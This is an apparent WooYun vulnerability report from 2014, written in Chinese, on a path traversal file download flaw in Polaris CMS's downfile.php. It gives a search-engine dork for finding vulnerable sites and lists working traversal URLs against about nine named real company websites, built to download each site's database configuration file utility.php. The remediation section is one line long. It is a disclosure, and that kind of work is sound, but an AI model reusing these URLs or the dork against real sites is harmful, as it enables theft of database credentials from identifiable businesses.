漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-059438
漏洞标题:某企业建站系统cms任意文件下载漏洞(影响多个实例)
相关厂商:Polaris cms
漏洞作者: 梧桐雨
提交时间:2014-05-05 10:43
修复时间:2014-08-03 10:44
公开时间:2014-08-03 10:44
漏洞类型:任意文件遍历/下载
危害等级:高
自评Rank:18
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-05-05: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-08-03: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
任意文件下载
详细说明:
存在该漏洞的cms是 Polaris cms
google关键字:downfile.php?direct 就可以找到许多,有的找不到的 请看我下面提供的列表即可:)
主要是当开启了下载模块:即download.php。
对传入的参数没有进行很好的过滤。产生了任意文件下载。
来看看实例1
http://www.sigmarobot.com/
开启了下载模块之后我们访问如下链接:
文件源码妥妥的,躺在了 我们的文件夹中
呀。。这根本没有过滤啊!
通过对文件系统的首页下载分析。得到数据库配置文件:
utility.php
好咯,既然在根目录,我们直接就down回来看看
http://www.sigmarobot.com/downfile.php?direct=../&file=utility.php
一切都那么自然。。
漏洞证明:
好了,下面来一波:
http://www.sigmarobot.com/downfile.php?direct=../&file=utility.php
http://www.tan-star.com.tw/downfile.php?direct=../&file=utility.php
http://www.injection.com.tw/downfile.php?direct=../&file=utility.php
全部贴图有点累,就贴上面这些吧。
下面这些也是可以下载的哦:
www.chaowei.com.tw/downfile.php?direct=../&file=downfile.php
www.injection.com.tw/downfile.php?direct=../&file=downfile.php
www.webcontrol.com.tw/downfile.php?direct=../&file=downfile.php
http://www.sencar.com.tw/downfile.php?direct=../&file=downfile.php
http://www.avitaplas.com/downfile.php?direct=../&file=downfile.php
http://www.human-video.com/downfile.php?direct=../&file=downfile.php
不一一列举了。。。
这里有一个列表:
http://www.polaris.net.tw/tw/webdesign_list.html 得注意这个漏洞的条件只需要网站系统开启了下载模块 download.php即可了!
看了下,影响较多台湾小企业网站,大陆只是占少数。
修复方案:
对传入参数进行有效性验证。
版权声明:转载请注明来源 梧桐雨@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝